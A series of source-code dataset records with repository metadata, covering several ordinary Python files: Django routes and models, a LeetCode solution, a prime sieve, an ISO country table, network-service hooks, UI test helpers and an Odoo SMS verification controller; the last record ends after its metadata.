4fec7ab88e9eb5f629a088b997138a2b641ed5cb
|
[
"MIT"
] |
permissive
|
Ken-mbira/PHOTO_BOOK
|
f1bd1bd65af228b0600bf69da12840897eb109ad
|
d47cd8dabd4b92e3befdafe2d99db266be31ffff
|
refs/heads/master
| 2023-08-19T06:55:07.309342 | 2021-10-12T11:05:00 | 2021-10-12T11:05:00 | 414,297,623 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 521 |
py
|
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from . import views
# Route table for the photo app: landing page, image listing/detail,
# category filtering, and search.
urlpatterns = [
    path('',views.index,name = 'home'),
    path('images/',views.images,name = 'images'),
    path('images/<int:pk>',views.image_spec,name = 'image'),
    path('category/<int:pk>',views.image_category,name = 'category'),
    path('search',views.search_images, name="search")
]

# Serve user-uploaded media through Django only during development;
# in production the web server should serve MEDIA_URL directly.
if settings.DEBUG:
    urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
20cf30291dd3e1ce42e9eac92e98cb83666fbc14
|
303bac96502e5b1666c05afd6c2e85cf33f19d8c
|
/solutions/python3/946.py
|
08e5a7f4e305aa8dfddd5a773566d9bdd70744e5
|
[
"MIT"
] |
permissive
|
jxhangithub/leetcode
|
5e82f4aeee1bf201e93e889e5c4ded2fcda90437
|
0de1af607557d95856f0e4c2a12a56c8c57d731d
|
refs/heads/master
| 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 |
MIT
| 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null |
UTF-8
|
Python
| false | false | 392 |
py
|
class Solution:
    def validateStackSequences(self, pushed, popped):
        """
        Check whether `popped` could be produced by some sequence of push and
        pop operations on an initially empty stack fed with `pushed`.

        :type pushed: List[int]
        :type popped: List[int]
        :rtype: bool
        """
        simulated = []
        pop_index = 0
        for value in pushed:
            simulated.append(value)
            # Greedily pop whenever the stack top matches the next expected pop.
            while simulated and simulated[-1] == popped[pop_index]:
                simulated.pop()
                pop_index += 1
        # Whatever remains must come off in exactly the reverse of the
        # unconsumed tail of `popped`.
        return simulated == popped[pop_index:][::-1]
|
[
"[email protected]"
] | |
f2a2c09d102ebb4c12b5678990d4b07e6fa71280
|
16eaa90eec58137c7cf0e429e574499d00ee21f2
|
/apps/manga/models/manga.py
|
325ffa9c350f2a247de6aad14b844a1d38c33887
|
[
"MIT"
] |
permissive
|
eliezer-borde-globant/lemanga
|
53c48f91f5df4671c1653ab927acab3c95097468
|
57c799804754f6a91fd214faac84d9cd017fc0c4
|
refs/heads/master
| 2023-02-16T23:25:49.889702 | 2020-12-28T17:27:49 | 2020-12-28T17:27:49 | 322,420,102 | 0 | 0 |
MIT
| 2020-12-17T23:10:32 | 2020-12-17T21:43:56 | null |
UTF-8
|
Python
| false | false | 748 |
py
|
from __future__ import unicode_literals
import uuid
from django.core.urlresolvers import reverse_lazy
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from autoslug import AutoSlugField
@python_2_unicode_compatible
class Manga(models.Model):
    """A manga title, addressable in URLs by an auto-generated slug."""

    # Random UUID primary key instead of a sequential integer id.
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    name = models.CharField(max_length=200, unique=True)
    # Slug derived from `name`; always_update=True means renaming the manga
    # changes its slug (and therefore its URL).
    slug = AutoSlugField(populate_from='name', unique=True, always_update=True)

    class Meta:
        verbose_name = "Manga"
        verbose_name_plural = "Mangas"

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # reverse_lazy: the URLConf may not be loaded when this module is imported.
        return reverse_lazy('detail-manga', kwargs={"name": self.slug})
|
[
"[email protected]"
] | |
528f4f027317f1d22c63b7a145d3182c87daa77f
|
86fc644c327a8d6ea66fd045d94c7733c22df48c
|
/scripts/managed_cpe_services/customer/single_cpe_dual_wan_site/single_cpe_dual_wan_site_services/cpe_primary_wan/end_points/bgp_peers/service_customization.py
|
7e389e7294aa0bde9644faa5fec5bf5a73b91948
|
[] |
no_license
|
lucabrasi83/anutacpedeployment
|
bfe703657fbcf0375c92bcbe7560051817f1a526
|
96de3a4fd4adbbc0d443620f0c53f397823a1cad
|
refs/heads/master
| 2021-09-24T16:44:05.305313 | 2018-10-12T02:41:18 | 2018-10-12T02:41:18 | 95,190,459 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,162 |
py
|
#
# This computer program is the confidential information and proprietary trade
# secret of Anuta Networks, Inc. Possessions and use of this program must
# conform strictly to the license agreement between the user and
# Anuta Networks, Inc., and receipt or possession does not convey any rights
# to divulge, reproduce, or allow others to use this program without specific
# written authorization of Anuta Networks, Inc.
#
# Copyright (c) 2015-2016 Anuta Networks, Inc. All Rights Reserved.
#
#
#ALL THE CUSTOMIZATIONS REGARDING DATAPROCESSING SHOULD BE WRITTEN INTO THIS FILE
#
"""
Tree Structure of Handled XPATH:
services
|
managed-cpe-services
|
customer
|
single-cpe-dual-wan-site
|
single-cpe-dual-wan-site-services
|
cpe-primary-wan
|
end-points
|
bgp-peers
Schema Representation:
/services/managed-cpe-services/customer/single-cpe-dual-wan-site/single-cpe-dual-wan-site-services/cpe-primary-wan/end-points/bgp-peers
"""
"""
Names of Leafs for this Yang Entity
BGP-peer-name
peer-ip
peer-description
remote-as
password
import-route-map
export-route-map
next-hop-self
soft-reconfiguration
default-originate
default-originate-route-map
send-community
encrypted-password
advertisement-interval
time-in-sec
timers
keepalive-interval
holdtime
"""
from servicemodel import util
from servicemodel import yang
from servicemodel import devicemgr
from cpedeployment.cpedeployment_lib import getLocalObject
from cpedeployment.cpedeployment_lib import getDeviceObject
from cpedeployment.cpedeployment_lib import getCurrentObjectConfig
from cpedeployment.cpedeployment_lib import ServiceModelContext
from cpedeployment.cpedeployment_lib import getParentObject
from cpedeployment.cpedeployment_lib import log
from cpedeployment.bgppeer_lib import bgp_peer
from cpedeployment.bgppeer_lib import update_bgp_peer
class ServiceDataCustomization:
    """Data-processing hooks for the cpe-primary-wan end-point BGP peer
    service node. Each callback is invoked by the Anuta framework at the
    corresponding lifecycle stage; business logic is delegated to
    bgp_peer()/update_bgp_peer().

    NOTE: kwargs.iteritems() is Python 2 only — this module targets a
    Python 2 runtime.
    """

    @staticmethod
    def process_service_create_data(smodelctx, sdata, dev, **kwargs):
        """ Custom API to modify the inputs"""
        modify = True
        if modify and kwargs is not None:
            # Debug-log every keyword argument supplied by the framework.
            for key, value in kwargs.iteritems():
                log("%s == %s" %(key,value))
        if modify:
            # Template hook: config/inputdict are extracted for customization
            # but not otherwise used here.
            config = kwargs['config']
            inputdict = kwargs['inputdict']

    @staticmethod
    def process_service_device_bindings(smodelctx, sdata, dev, **kwargs):
        """ Custom API to modify the device bindings or Call the Business Login Handlers"""
        modify = True
        if modify and kwargs is not None:
            for key, value in kwargs.iteritems():
                log("%s == %s" %(key,value))
        if modify:
            config = kwargs['config']
            inputdict = kwargs['inputdict']
            devbindobjs = kwargs['devbindobjs']
            # Apply the BGP peer creation logic to every bound device.
            for device in util.convert_to_list(dev):
                bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)

    @staticmethod
    def process_service_update_data(smodelctx, sdata, **kwargs):
        """callback called for update operation"""
        modify = True
        if modify and kwargs is not None:
            for key, value in kwargs.iteritems():
                log("%s == %s" %(key,value))
            # On update the device handle arrives via kwargs, not a parameter.
            dev = kwargs['dev']
            for device in util.convert_to_list(dev):
                update_bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)

    @staticmethod
    def process_service_delete_data(smodelctx, sdata, **kwargs):
        """callback called for delete operation"""
        # Deletion needs no extra data processing; modify=False keeps the
        # logging block disabled.
        modify = False
        if modify and kwargs is not None:
            for key, value in kwargs.iteritems():
                log("%s == %s" %(key,value))
class DeletePreProcessor(yang.SessionPreProcessor):
    """Session hook run before a delete session is reserved."""

    def processBeforeReserve(self, session):
        # Add any move operations for deletion here.
        ops = session.getOperations()
        log('operations: %s' % (ops,))
class CreatePreProcessor(yang.SessionPreProcessor):
    """Session hook run before a create session is reserved."""

    def processBeforeReserve(self, session):
        # Add any move operations for creation here.
        ops = session.getOperations()
        log('operations: %s' % (ops,))
|
[
"[email protected]"
] | |
33342edc351835d96fc30b2229c64f36d1195aa5
|
0e25538b2f24f1bc002b19a61391017c17667d3d
|
/storefront/win_sfstore.py
|
182c135f774ac6bf02adb5b401eac608aa296006
|
[] |
no_license
|
trondhindenes/Ansible-Auto-Generated-Modules
|
725fae6ba9b0eef00c9fdc21179e2500dfd6725f
|
efa6ac8cd2b545116f24c1929936eb8cc5c8d337
|
refs/heads/master
| 2020-04-06T09:21:00.756651 | 2016-10-07T07:08:29 | 2016-10-07T07:08:29 | 36,883,816 | 12 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,533 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# <COPYRIGHT>
# <CODEGENMETA>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_sfstore
version_added:
short_description: Generated from DSC module storefront version 0.9.4 at 07.10.2016 01.23.53
description:
- The Storefront DSC resources can automate the deployment and configuration of Citrix Storefront 3.5. These DSC resources are provided AS IS, and are not supported through any means.
options:
AuthenticationServiceVirtualPath:
description:
-
required: True
default:
aliases: []
VirtualPath:
description:
-
required: True
default:
aliases: []
Ensure:
description:
-
required: False
default:
aliases: []
choices:
- Absent
- Present
FriendlyName:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_username:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_password:
description:
-
required: False
default:
aliases: []
SiteId:
description:
-
required: False
default:
aliases: []
AutoInstallModule:
description:
- If true, the required dsc resource/module will be auto-installed using the Powershell package manager
required: False
default: false
aliases: []
choices:
- true
- false
AutoConfigureLcm:
description:
- If true, LCM will be auto-configured for directly invoking DSC resources (which is a one-time requirement for Ansible DSC modules)
required: False
default: false
aliases: []
choices:
- true
- false
|
[
"[email protected]"
] | |
abf55a6e89c418a0d6cb8142f1025f77d7a05d97
|
3879d1ca43c573c209f962182cd1e7f7fe978fbf
|
/binarysearch/Generate-Primes/Generate-Primes.py
|
732a67fc393a9520ae82b86615fcb9d57bfa042b
|
[] |
no_license
|
DoctorLai/ACM
|
34a5600a5adf22660c5d81b2d8b7a358be537ecf
|
aefa170f74c55c1230eb6f352770512b1e3f469e
|
refs/heads/master
| 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 |
C++
|
UTF-8
|
Python
| false | false | 538 |
py
|
# https://helloacm.com/teaching-kids-programmaing-generate-prime-numbers-using-sieve-of-eratosthenes-algorithms/
# https://binarysearch.com/problems/Generate-Primes
# EASY, MATH
class Solution:
    """Sieve of Eratosthenes: enumerate the primes in [1, n]."""

    def solve(self, n):
        """Return the sorted list of primes p with 2 <= p <= n."""
        # sieve[k] stays True while k is still a prime candidate;
        # 0 and 1 are excluded up front.
        sieve = [False, False] + [True] * (n - 1)
        p = 2
        while p * p <= n:
            if sieve[p]:
                # Cross off every multiple of p starting at 2p.
                for multiple in range(p + p, n + 1, p):
                    sieve[multiple] = False
            p += 1
        return [value for value, is_prime in enumerate(sieve) if is_prime]
|
[
"[email protected]"
] | |
7e9bc8c8ada0baa06ab47fa561af1ba9a1656353
|
4e96f383d4703ad8ee58869ed91a0c8432c8a051
|
/Cura/Uranium/UM/Scene/GroupDecorator.py
|
683f4d0b12d57e068187742b233f7f8283baa708
|
[
"GPL-3.0-only",
"LGPL-3.0-only"
] |
permissive
|
flight7788/3d-printing-with-moveo-1
|
b2dba26010c4fa31815bc1d2d0966161a8600081
|
7fcb9c6b5da9245d54ac917de8c2a7f5148e42b0
|
refs/heads/Feature_Marlin_with_AlanBoy
| 2022-08-30T18:36:44.785058 | 2020-05-30T07:52:58 | 2020-05-30T07:52:58 | 212,583,912 | 0 | 0 |
MIT
| 2020-05-16T07:39:47 | 2019-10-03T13:13:01 |
C
|
UTF-8
|
Python
| false | false | 1,777 |
py
|
from UM.Scene.SceneNodeDecorator import SceneNodeDecorator
from UM.Scene.Selection import Selection
from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from UM.Scene.SceneNode import SceneNode
class GroupDecorator(SceneNodeDecorator):
    """Marks a scene node as a group; optionally removes the node from the
    scene when its last child disappears, in a way that can be undone."""

    def __init__(self, remove_when_empty: bool = True) -> None:
        super().__init__()
        self._remove_when_empty = remove_when_empty
        # Parent the group had before it removed itself from the scene;
        # kept so the removal can be reversed when a child reappears.
        self._old_parent = None  # type: Optional[SceneNode]

    def setNode(self, node: "SceneNode") -> None:
        super().setNode(node)
        if self._node is not None:
            self._node.childrenChanged.connect(self._onChildrenChanged)

    def isGroup(self) -> bool:
        return True

    def getOldParent(self) -> Optional["SceneNode"]:
        return self._old_parent

    def _onChildrenChanged(self, node: "SceneNode") -> None:
        if self._node is None or not self._remove_when_empty:
            return
        if self._node.hasChildren():
            # A group that removed itself earlier re-attaches to its old
            # parent as soon as it gains a child again.
            if not self._node.getParent() and self._old_parent:
                self._node.setParent(self._old_parent)
                self._old_parent = None
        else:
            # An emptied group detaches itself from the scene (undoably).
            self._old_parent = self._node.getParent()
            self._node.setParent(None)
            Selection.remove(self._node)

    def __deepcopy__(self, memo):
        return GroupDecorator()
|
[
"[email protected]"
] | |
2f9bce858147dcf1996bd5661690506c4d32d259
|
d7fe33ef0959cf8d319db5e8c9d08b22ac100f50
|
/04_tavli/main/iso.py
|
0702a8fc0b4e479c0242e8db766984c6c5095ffb
|
[
"MIT"
] |
permissive
|
georstef/GoogleAppEngine
|
79aaa3a969457ea318c4d5e50258d7b424dff7cc
|
008845ec768926513b1e5219267ea12e184cf3be
|
refs/heads/master
| 2020-04-20T21:34:29.654551 | 2014-08-03T11:07:04 | 2014-08-03T11:07:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,179 |
py
|
# coding: utf-8
ISO_3166 = {
'AF': 'Afghanistan',
'AX': 'Åland Islands',
'AL': 'Albania',
'DZ': 'Algeria',
'AS': 'American Samoa',
'AD': 'Andorra',
'AO': 'Angola',
'AI': 'Anguilla',
'AQ': 'Antarctica',
'AG': 'Antigua and Barbuda',
'AR': 'Argentina',
'AM': 'Armenia',
'AW': 'Aruba',
'AU': 'Australia',
'AT': 'Austria',
'AZ': 'Azerbaijan',
'BS': 'Bahamas',
'BH': 'Bahrain',
'BD': 'Bangladesh',
'BB': 'Barbados',
'BY': 'Belarus',
'BE': 'Belgium',
'BZ': 'Belize',
'BJ': 'Benin',
'BM': 'Bermuda',
'BT': 'Bhutan',
'BO': 'Bolivia',
'BQ': 'Bonaire',
'BA': 'Bosnia and Herzegovina',
'BW': 'Botswana',
'BV': 'Bouvet Island',
'BR': 'Brazil',
'IO': 'British Indian Ocean Territory',
'BN': 'Brunei Darussalam',
'BG': 'Bulgaria',
'BF': 'Burkina Faso',
'BI': 'Burundi',
'KH': 'Cambodia',
'CM': 'Cameroon',
'CA': 'Canada',
'CV': 'Cape Verde',
'KY': 'Cayman Islands',
'CF': 'Central African Republic',
'TD': 'Chad',
'CL': 'Chile',
'CN': 'China',
'CX': 'Christmas Island',
'CC': 'Cocos (Keeling) Islands',
'CO': 'Colombia',
'KM': 'Comoros',
'CG': 'Congo',
'CD': 'Congo, the Democratic Republic of the',
'CK': 'Cook Islands',
'CR': 'Costa Rica',
'CI': "Côte d'Ivoire",
'HR': 'Croatia',
'CU': 'Cuba',
'CW': 'Curaçao',
'CY': 'Cyprus',
'CZ': 'Czech Republic',
'DK': 'Denmark',
'DJ': 'Djibouti',
'DM': 'Dominica',
'DO': 'Dominican Republic',
'EC': 'Ecuador',
'EG': 'Egypt',
'SV': 'El Salvador',
'GQ': 'Equatorial Guinea',
'ER': 'Eritrea',
'EE': 'Estonia',
'ET': 'Ethiopia',
'FK': 'Falkland Islands (Malvinas)',
'FO': 'Faroe Islands',
'FJ': 'Fiji',
'FI': 'Finland',
'FR': 'France',
'GF': 'French Guiana',
'PF': 'French Polynesia',
'TF': 'French Southern Territories',
'GA': 'Gabon',
'GM': 'Gambia',
'GE': 'Georgia',
'DE': 'Germany',
'GH': 'Ghana',
'GI': 'Gibraltar',
'GR': 'Greece',
'GL': 'Greenland',
'GD': 'Grenada',
'GP': 'Guadeloupe',
'GU': 'Guam',
'GT': 'Guatemala',
'GG': 'Guernsey',
'GN': 'Guinea',
'GW': 'Guinea-Bissau',
'GY': 'Guyana',
'HT': 'Haiti',
'HM': 'Heard Island and McDonald Islands',
'VA': 'Holy See (Vatican City State)',
'HN': 'Honduras',
'HK': 'Hong Kong',
'HU': 'Hungary',
'IS': 'Iceland',
'IN': 'India',
'ID': 'Indonesia',
'IR': 'Iran',
'IQ': 'Iraq',
'IE': 'Ireland',
'IM': 'Isle of Man',
'IL': 'Israel',
'IT': 'Italy',
'JM': 'Jamaica',
'JP': 'Japan',
'JE': 'Jersey',
'JO': 'Jordan',
'KZ': 'Kazakhstan',
'KE': 'Kenya',
'KI': 'Kiribati',
'KP': 'North Korea',
'KR': 'South Korea',
'KW': 'Kuwait',
'KG': 'Kyrgyzstan',
'LA': "Lao People's Democratic Republic",
'LV': 'Latvia',
'LB': 'Lebanon',
'LS': 'Lesotho',
'LR': 'Liberia',
'LY': 'Libya',
'LI': 'Liechtenstein',
'LT': 'Lithuania',
'LU': 'Luxembourg',
'MO': 'Macao',
'MK': 'Macedonia, the former Yugoslav Republic of',
'MG': 'Madagascar',
'MW': 'Malawi',
'MY': 'Malaysia',
'MV': 'Maldives',
'ML': 'Mali',
'MT': 'Malta',
'MH': 'Marshall Islands',
'MQ': 'Martinique',
'MR': 'Mauritania',
'MU': 'Mauritius',
'YT': 'Mayotte',
'MX': 'Mexico',
'FM': 'Micronesia, Federated States of',
'MD': 'Moldova',
'MC': 'Monaco',
'MN': 'Mongolia',
'ME': 'Montenegro',
'MS': 'Montserrat',
'MA': 'Morocco',
'MZ': 'Mozambique',
'MM': 'Myanmar',
'NA': 'Namibia',
'NR': 'Nauru',
'NP': 'Nepal',
'NL': 'Netherlands',
'NC': 'New Caledonia',
'NZ': 'New Zealand',
'NI': 'Nicaragua',
'NE': 'Niger',
'NG': 'Nigeria',
'NU': 'Niue',
'NF': 'Norfolk Island',
'MP': 'Northern Mariana Islands',
'NO': 'Norway',
'OM': 'Oman',
'PK': 'Pakistan',
'PW': 'Palau',
'PS': 'Palestine, State of',
'PA': 'Panama',
'PG': 'Papua New Guinea',
'PY': 'Paraguay',
'PE': 'Peru',
'PH': 'Philippines',
'PN': 'Pitcairn',
'PL': 'Poland',
'PT': 'Portugal',
'PR': 'Puerto Rico',
'QA': 'Qatar',
'RE': 'Réunion',
'RO': 'Romania',
'RU': 'Russia',
'RW': 'Rwanda',
'BL': 'Saint Barthélemy',
'SH': 'Saint Helena, Ascension and Tristan da Cunha',
'KN': 'Saint Kitts and Nevis',
'LC': 'Saint Lucia',
'MF': 'Saint Martin (French part)',
'PM': 'Saint Pierre and Miquelon',
'VC': 'Saint Vincent and the Grenadines',
'WS': 'Samoa',
'SM': 'San Marino',
'ST': 'Sao Tome and Principe',
'SA': 'Saudi Arabia',
'SN': 'Senegal',
'RS': 'Serbia',
'SC': 'Seychelles',
'SL': 'Sierra Leone',
'SG': 'Singapore',
'SX': 'Sint Maarten (Dutch part)',
'SK': 'Slovakia',
'SI': 'Slovenia',
'SB': 'Solomon Islands',
'SO': 'Somalia',
'ZA': 'South Africa',
'GS': 'South Georgia and the South Sandwich Islands',
'SS': 'South Sudan',
'ES': 'Spain',
'LK': 'Sri Lanka',
'SD': 'Sudan',
'SR': 'Suriname',
'SJ': 'Svalbard and Jan Mayen',
'SZ': 'Swaziland',
'SE': 'Sweden',
'CH': 'Switzerland',
'SY': 'Syrian Arab Republic',
'TW': 'Taiwan',
'TJ': 'Tajikistan',
'TZ': 'Tanzania, United Republic of',
'TH': 'Thailand',
'TL': 'Timor-Leste',
'TG': 'Togo',
'TK': 'Tokelau',
'TO': 'Tonga',
'TT': 'Trinidad and Tobago',
'TN': 'Tunisia',
'TR': 'Turkey',
'TM': 'Turkmenistan',
'TC': 'Turks and Caicos Islands',
'TV': 'Tuvalu',
'UG': 'Uganda',
'UA': 'Ukraine',
'AE': 'United Arab Emirates',
'GB': 'United Kingdom',
'US': 'United States',
'UM': 'United States Minor Outlying Islands',
'UY': 'Uruguay',
'UZ': 'Uzbekistan',
'VU': 'Vanuatu',
'VE': 'Venezuela',
'VN': 'Vietnam',
'VG': 'Virgin Islands, British',
'VI': 'Virgin Islands, U.S.',
'WF': 'Wallis and Futuna',
'EH': 'Western Sahara',
'YE': 'Yemen',
'ZM': 'Zambia',
'ZW': 'Zimbabwe',
}
|
[
"[email protected]"
] | |
85566a279360d8fee75c2ed3b6a5c4fe6426afc1
|
30d360f965253167c99f9b4cd41001491aed08af
|
/PTFE_code/integrate_profile.py
|
4ba0587d6305af16574d6b5b2d36c2e9a6d5dba3
|
[] |
no_license
|
petervanya/PhDcode
|
d2d9f7170f201d6175fec9c3d4094617a5427fb5
|
891e6812a2699025d26b901c95d0c46a706b0c96
|
refs/heads/master
| 2020-05-22T06:43:47.293134 | 2018-01-29T12:59:42 | 2018-01-29T12:59:42 | 64,495,043 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,856 |
py
|
#!/usr/bin/env python
"""Usage: integrate_profile.py <profile> <d> [--L <L>]

[AD HOC] Load 1d water profile and integrate
volume of water in polymer and in electrodes.

Arguments:
    <file>         Water profile, columns [r, f]
    <d>            Slab width in nm

Options:
    --L <L>        Box size in DPD units [default: 40]

09/11/16
"""
# NOTE: the module docstring above is also the docopt CLI specification;
# do not edit it without re-checking docopt parsing.
import numpy as np
from scipy.integrate import simps
import sys
from docopt import docopt

rc = 8.14e-10  # DPD length scale in metres; converts nm -> DPD units below

if __name__ == "__main__":
    args = docopt(__doc__)
    L = float(args["--L"])      # box size, DPD units
    d_nm = float(args["<d>"])   # slab (film) width, nm
    d = d_nm * 1e-9 / rc        # slab width converted to DPD units

    try:
        A = np.loadtxt(args["<profile>"])
    except FileNotFoundError:
        sys.exit("No file found: %s." % args["<profile>"])
    r, f = A[:, 0], A[:, 1]     # grid coordinate and profile value columns

    if d < 0.0 or d > L:
        sys.exit("Slab width larger than box size.")

    print("===== Integrating water profile =====")
    print("L: %.2f | slab width: %.2f (%.2f nm)" % (L, d, d_nm))
    dr = r[1] - r[0]  # grid spacing; assumes a uniform grid -- TODO confirm
    # Partition the domain into the central film [(L-d)/2, (L+d)/2] and the
    # two electrode regions on either side of it.
    re1 = r[r < (L-d)/2]
    re2 = r[r > (L+d)/2]
    rm = r[(r >= (L-d)/2) & (r <= (L+d)/2)]
    fe1 = f[r < (L-d)/2]
    fe2 = f[r > (L+d)/2]
    fm = f[(r >= (L-d)/2) & (r <= (L+d)/2)]

    # Simpson-rule integrals of the profile over each region.
    water_film = simps(fm, dx=dr)
    water_elec = simps(fe1, dx=dr) + simps(fe2, dx=dr)
    water_tot = simps(f, dx=dr)
    print("Total water: %.2f" % water_tot)
    print("Electrodes: %.2f | Film: %.2f | mat / el: %.2f" % \
        (water_elec, water_film, water_film / water_elec))
    R = water_film / (water_film + water_elec)
    print("Ratio of water in the film: %.2f" % R)

    # Earlier naive-quadrature version kept for reference:
    # water_film = np.sum(fm) * dr
    # water_elec = (np.sum(fe1) + np.sum(fe2)) * dr
    # water_tot = np.sum(f) * dr
    #
    # print("Naive quadrature | Total water: %.2f" % water_tot)
    # print("Electrodes: %.2f | Matrix: %.2f | mat / el: %.2f" % \
    #    (water_elec, water_film, water_film / water_elec))
[
"[email protected]"
] | |
0bea389e510b7977e448170db9a97655fd4abd53
|
7b4e9342d42be2b55af5dc23a8abedd672d68e99
|
/MobileApps/libs/flows/mac/smart/screens/printersettings/printer_from_other_devices.py
|
96ab7c3b1a277a1e82cb0c00364ddd13f515ba52
|
[] |
no_license
|
Amal548/QAMA
|
af5bb335c92a90b461f1ee9a3870435d83d46802
|
b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5
|
refs/heads/master
| 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,596 |
py
|
# encoding: utf-8
'''
Description: It defines the operations of element and verification methods on
the printer from other devices screen.
@author: Sophia
@create_date: Sep 18, 2019
'''
import logging
from MobileApps.libs.flows.mac.smart.screens.smart_screens import SmartScreens
from MobileApps.libs.flows.mac.smart.screens.printersettings.printer_setting_scroll import PrinterSettingScroll
class PrinterFromOtherDevices(PrinterSettingScroll, SmartScreens):
    """Screen object for the "print from other devices" printer-settings
    screen: element operations and verification helpers."""

    # Identifiers the flow framework uses to locate this screen's definition.
    folder_name = "printersettings"
    flow_name = "print_from_other_devices"

    def __init__(self, driver):
        """Initialize the screen object.

        :param driver: UI-automation driver used to locate/act on elements.
        """
        super(PrinterFromOtherDevices, self).__init__(driver)
    # -------------------------------Operate Elements------------------------------
    def wait_for_screen_load(self, timeout=30, raise_e=True):
        """Wait until the screen has loaded, keyed on the send-link button.

        :param timeout: seconds to wait for the element to appear.
        :param raise_e: if True, raise when the element never appears.
        :return: result of driver.wait_for_object — presumably the located
            element (truthy) or a falsy value on timeout; verify with driver API.
        """
        logging.debug("[PrinterFromOtherDevices]:[wait_for_screen_load]-Wait for screen loading... ")
        return self.driver.wait_for_object("send_link_btn", timeout=timeout, raise_e=raise_e)

    def click_send_link_btn(self):
        """Click the send-link button on this screen.

        :return: None
        """
        logging.debug("[PrinterFromOtherDevices]:[click_send_link_btn]-Click send link button... ")
        self.driver.click("send_link_btn")
    # -------------------------------Verification Methods--------------------------
|
[
"[email protected]"
] | |
89dece8d86d548eb18d50cf9020cc5d85d9c4d93
|
4b4d21f6a2aaf8cb0ece595e4aaf9cb705ffdd49
|
/marketing_message/controllers/controllers.py
|
c83db22f29b37ed9ac02bcf44de219ae2e23a33a
|
[] |
no_license
|
sc4you/odoo-project-10.0
|
e8c82b4cd42c0672e996561e75e0f9d0717821fa
|
bca7e400b6316bcbcefe6f0d088cb97a28f644bb
|
refs/heads/master
| 2020-03-21T13:41:08.042847 | 2018-05-15T07:41:58 | 2018-05-15T07:41:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,270 |
py
|
# -*- coding: utf-8 -*-
import babel.dates
import time, json
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
import werkzeug.urls
from werkzeug.exceptions import NotFound
import random
from odoo import http
from odoo import tools
from odoo.http import request
from odoo.tools.translate import _
from odoo.exceptions import UserError, ValidationError
import httplib
import urllib
import json
# Terms of service
class SmsEvent(http.Controller):
    """Odoo HTTP controller (Python 2) that sends SMS verification codes
    through an external gateway configured via ``ir.config_parameter``."""

    def __init__(self):
        # Gateway credentials and endpoints come from Odoo system parameters;
        # missing parameters fall back to the empty string.
        param = request.env()['ir.config_parameter']
        self.account = param.get_param('account') or ''
        self.password = param.get_param('password') or ''
        self.host_sign = param.get_param('host_sign') or ''
        self.host_marketing = param.get_param('host_marketing') or ''
        self.sms_heard = param.get_param('sms_heard') or ''

    # Send a POST request to the SMS gateway; returns the raw response body,
    # or False on any network/HTTP error.
    def send_post(self, datas, host, sms_send_uri):
        try:
            datas = json.dumps(datas)
            """发送post请求"""
            headers = {"Content-type": "application/json"}
            conn = httplib.HTTPConnection(host, port=80, timeout=30)
            conn.request("POST", sms_send_uri, datas, headers)
            response = conn.getresponse()
            response_str = response.read()
            conn.close()
            return response_str
        except Exception:
            # Best-effort: any failure is collapsed to False for the caller.
            return False

    # Send an SMS verification code to `tel`; returns the code on success,
    # False when the gateway is unreachable, raises UserError otherwise.
    def commit_send_message(self, tel, code):
        sms_send_uri = "/msg/variable/json"
        phone = tel
        code = code
        params = phone + ',' + code
        # The {$var} placeholder is substituted by the gateway from `params`.
        msg = self.sms_heard + u"您好!验证码是:{$var}"
        # NOTE(review): duplicated debug prints left over from development.
        print self.account
        print self.account
        datas = {
            'account': self.account,
            'password': self.password,
            'msg': msg,
            'params': params
        }
        send_result = self.send_post(datas, self.host_sign, sms_send_uri)
        print send_result
        if not send_result:
            return False
        else:
            sort_data = json.loads(send_result)
            print sort_data
            # The gateway signals success with code == 0; otherwise surface
            # its error message to the user.
            if int(sort_data["code"]) == 0:
                return code
            else:
                raise UserError(_(sort_data['errorMsg']))
|
[
"[email protected]"
] | |
0961c7df4a2719e2dfeeece2c5a57cf3f59e263c
|
2cb507ecd6629b9ff457a36e462f987913d94c1a
|
/python核心技术与实战/23/gil.py
|
f3ccf2898fadf6e776549b48a927183257a39720
|
[
"Apache-2.0"
] |
permissive
|
youaresherlock/PythonPractice
|
6869e0a5949675198826e5a07552237a636d6f5b
|
2e22d3fdcb26353cb0d8215c150e84d11bc9a022
|
refs/heads/master
